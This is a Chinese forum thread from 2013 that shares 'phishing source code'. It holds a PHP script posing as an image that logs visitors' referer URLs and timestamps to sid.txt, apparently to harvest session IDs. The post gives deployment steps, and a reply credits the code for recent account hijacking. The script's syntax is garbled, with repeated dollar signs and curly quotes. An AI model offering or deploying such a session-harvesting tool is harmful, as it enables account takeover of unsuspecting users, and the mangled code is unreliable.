search 登录 注册
arrow_back返回列表
ID:60373
light_modedark_modestarstar
Lv.6 胸怀六国志
edit_note帖子 251
stars积分 393,143
event加入 2011-07-09
休闲灌水

PHP钓鱼源码分享

schedule发表于 2013-04-01 23:35:00 visibility查看 334 chat_bubble回复 3
#1 楼主
<?
$$$$id=rand(1,1);
$$$$image[1]=‘wx.gif‘;
header(“location:$$$$image[$$$$id]“);
?>
<?php
Header(“Content-type: image/php“);
$$$$url=$$$$_SERVER[‘HTTP_REFERER‘];
$$$$time=date(“Y-m-d H:i:s“);
$$$$file=fopen(“sid.txt“,“a+“);
fwrite($$$$file,str_pad($$$$url,15,“ “,1).“ “.$$$$time.“\n“);
fclose($$$$file);
?>


笔记本输入后改扩展名为php,上传空间,WX.gif为钓鱼图片,钓到的将会以sid.txt形式存在

全部回复 (3)

ID:60373
light_modedark_modestarstar
Lv.6 胸怀六国志
2013-04-01 23:41:00 沙发
超级简单,前几天那个串号的(苍老师,红肚兜)就是这个源码
ID:35009
light_modedark_modedark_modestar
Lv.3 畅意三江水
2013-04-02 07:13:00 板凳
源码呢?
ID:60373
light_modedark_modestarstar
Lv.6 胸怀六国志
2013-04-02 11:23:00 地板
2楼瞎了吗??
登录 后才能回复